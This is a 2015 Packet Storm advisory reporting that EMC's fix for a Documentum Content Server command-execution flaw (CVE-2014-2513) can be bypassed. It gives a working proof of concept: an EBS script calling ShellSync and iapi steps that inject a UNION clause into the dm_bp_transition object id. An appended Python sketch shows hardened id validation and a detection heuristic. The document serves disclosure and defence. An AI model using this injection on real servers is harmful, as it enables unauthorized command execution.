packetstorm PACKETSTORM:132628 (Jul 09, 2015)
EMC Documentum Content Server CVE-2014-2513 Bad Fix

2015-07-09 00:00:00
Andrey B. Panfilov
packetstormsecurity.com

EPSS: 0.009 (Low), percentile 81.0%

Product: EMC Documentum Content Server  
Vendor: EMC  
Version: ANY  
CVE: N/A  
Risk: High  
Status: public/not fixed  
  
In November 2013 I discovered a vulnerability in EMC Documentum Content Server  
which allows an authenticated user to execute arbitrary commands using the  
dm_bp_transition docbase method (for a detailed description see  
VRF#HUFPRMOP.txt).  
  
In July 2014 the vendor announced ESA-2014-064, which claimed that the  
vulnerability had been remediated.  
  
In November 2014 the fix was contested (there was a significant delay after  
ESA-2014-064 because the vendor constantly fails to provide the status of reported  
vulnerabilities) by providing another proof of concept. The description provided  
to CERT/CC (another CNA was chosen because the vendor fails to communicate) was:  
  
=================================8<================================  
I have tried to reproduce the PoC described in VRF#HUFPRMOP and got the following  
error:  
  
[ErrorCode] 1000 [Parameter] 0801fd08805c9dfe [ServerError] Unexpected  
error: [DM_API_W_NO_MATCH]warning: "There was no match in the  
docbase for the qualification: dm_procedure where r_object_id =  
'0801fd08805c9dfe'"  
  
Such behaviour means that EMC tried to remediate the security issue by  
"checking" the object type of the supplied object:  
  
Connected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle  
Session id is s0  
API> id,c,dm_procedure where r_object_id = '0801fd08805c9dfe'  
...  
[DM_API_W_NO_MATCH]warning: "There was no match in the docbase for the  
qualification: dm_procedure where r_object_id = '0801fd08805c9dfe'"  
  
API> Bye  
  
bin]$ strings dmbasic| grep dm_procedure  
id,%s,dm_procedure where object_name = '%s' and folder('%s')  
id,%s,dm_procedure where r_object_id = '%s'  
# old version of dmbasic binary  
bin]$ strings dmbasic| grep dm_procedure  
bin]$  
  
So, the fix was implemented in the dmbasic binary. The problem is that neither the 6.7  
SP2 P15 nor the 6.7 SP1 P28 patch contains the dmbasic binary - the first patch  
that shipped with the dmbasic binary was 6.7 SP2 P17. Moreover, the  
issue is still reproducible because the introduced check can be bypassed  
using SQL injection:  
  
~]$ cat test.ebs  
Public Function EntryCriteria(ByVal SessionId As String,_  
ByVal ObjectId As String,_  
ByVal UserName As String,_  
ByVal TargetState As String,_  
ByRef ErrorString As String) As Boolean  
t = ShellSync("echo dm_bp_transition_has_vulnerability > /tmp/test")  
EntryCriteria=True  
End Function  
~]$ cat /tmp/test  
cat: /tmp/test: No such file or directory  
  
~]$ iapi  
Please enter a docbase name (docubase): repo  
Please enter a user (dmadmin): test01  
Please enter password for test01:  
  
  
EMC Documentum iapi - Interactive API interface  
(c) Copyright EMC Corp., 1992 - 2011  
All rights reserved.  
Client Library Release 6.7.2190.0142  
  
  
Connecting to Server using docbase repo  
[DM_SESSION_I_SESSION_START]info: "Session 0101fd088014000c started for  
user test01."  
  
  
Connected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle  
Session id is s0  
API> create,c,dm_sysobject  
...  
0801fd08805c9dfe  
API> set,c,l,object_name  
SET> test  
...  
OK  
API> setfile,c,l,test.ebs,crtext  
...  
OK  
API> save,c,l  
...  
OK  
API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='  
repo repo dmadmin "" 0000000000000000 0000000000000000  
0000000000000000 "0801fd08805c9dfe,'' union select r_object_id  
from dm_sysobject where r_object_id=''0801fd08805c9dfe"  
0000000000000000 0000000000000000 0000000000000000 ""  
0 0 T F T T dmadmin 0000000000000000'  
  
...  
  
(1 row affected)  
  
API> Bye  
~]$ cat /tmp/test  
dm_bp_transition_has_vulnerability  
~]$  
  
Here the 'union ...' clause allows bypassing the check based on the "id" call:  
  
Connected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle  
Session id is s0  
API> id,c,dm_procedure where r_object_id='0801fd08805c9dfe,' union  
select r_object_id from dm_sysobject where  
r_object_id='0801fd08805c9dfe'  
...  
0801fd08805c9dfe  
API> apply,c,,GET_LAST_SQL  
...  
q0  
API> next,c,q0  
...  
OK  
API> get,c,q0,result  
...  
  
select all dm_procedure.r_object_id from dm_procedure_sp dm_procedure where  
((dm_procedure.r_object_id='0801fd08805c9dfe,')) and  
(dm_procedure.i_has_folder = 1 and dm_procedure.i_is_deleted = 0)  
union select all dm_sysobject.r_object_id from dm_sysobject_sp  
dm_sysobject where ((dm_sysobject.r_object_id= '0801fd08805c9dfe'))  
and (dm_sysobject.i_has_folder = 1 and dm_sysobject.i_is_deleted = 0)  
  
API> close,c,q0  
...  
OK  
  
The comma is required to bypass the error in the fetch call:  
API> fetch,c,0801fd08805c9dfe' union select r_object_id from  
dm_sysobject where r_object_id='0801fd08805c9dfe  
...  
[DM_API_E_BADID]error: "Bad ID given: 0801fd08805c9dfe' union  
select r_object_id from dm_sysobject where r_object_id=  
'0801fd08805c9dfe"  
  
  
API> fetch,c,0801fd08805c9dfe,' union select r_object_id from  
dm_sysobject where r_object_id='0801fd08805c9dfe  
...  
OK  
=================================>8================================  
  
__  
Regards,  
Andrey B. Panfilov   
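As an added illustration (not part of the advisory and not EMC's code), the following Python contrasts the format-string type check recovered from the dmbasic binary with a check that only accepts a well-formed object id, using the injected id from the advisory's proof of concept as input; the regex for an object id, the function names and the detection heuristic are assumptions.

```python
import re

# Format string recovered from the patched dmbasic binary (shown in the advisory).
DMBASIC_CHECK = "id,%s,dm_procedure where r_object_id = '%s'"

# Assumption: a Documentum object id is exactly 16 hexadecimal characters.
OBJECT_ID_RE = re.compile(r"\A[0-9a-f]{16}\Z", re.IGNORECASE)

# Injected "object id" from the advisory's second proof of concept (copied from
# the page, not invented) and the legitimate id it was derived from.
INJECTED_ID = ("0801fd08805c9dfe,' union select r_object_id "
               "from dm_sysobject where r_object_id='0801fd08805c9dfe")
GOOD_ID = "0801fd08805c9dfe"


def vulnerable_check_call(session, object_id):
    """Build the type check the way the patched dmbasic does: plain string
    substitution, so whatever the caller passes becomes part of the DQL."""
    return DMBASIC_CHECK % (session, object_id)


def hardened_check_call(session, object_id):
    """Same check, but refuse anything that is not a bare object id.
    With only hex characters allowed there is no way to close the quote
    or append a UNION, so the qualification stays a single equality."""
    if not OBJECT_ID_RE.match(object_id):
        raise ValueError("not a Documentum object id: %r" % object_id)
    return DMBASIC_CHECK % (session, object_id)


def hardened_accepts(session, object_id):
    """True if the hardened check would issue the id call at all."""
    try:
        hardened_check_call(session, object_id)
        return True
    except ValueError:
        return False


def qualification_is_tampered(api_call):
    """Detection heuristic for API traces (assumption): the legitimate check
    carries exactly two quote characters around the id and no set operator."""
    where = api_call.split("where", 1)[1]
    return where.count("'") != 2 or " union " in where.lower()


if __name__ == "__main__":
    print(vulnerable_check_call("c", INJECTED_ID))   # union lands in the DQL
    print(hardened_accepts("c", INJECTED_ID))         # False: rejected up front
    print(qualification_is_tampered(vulnerable_check_call("c", INJECTED_ID)))
```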
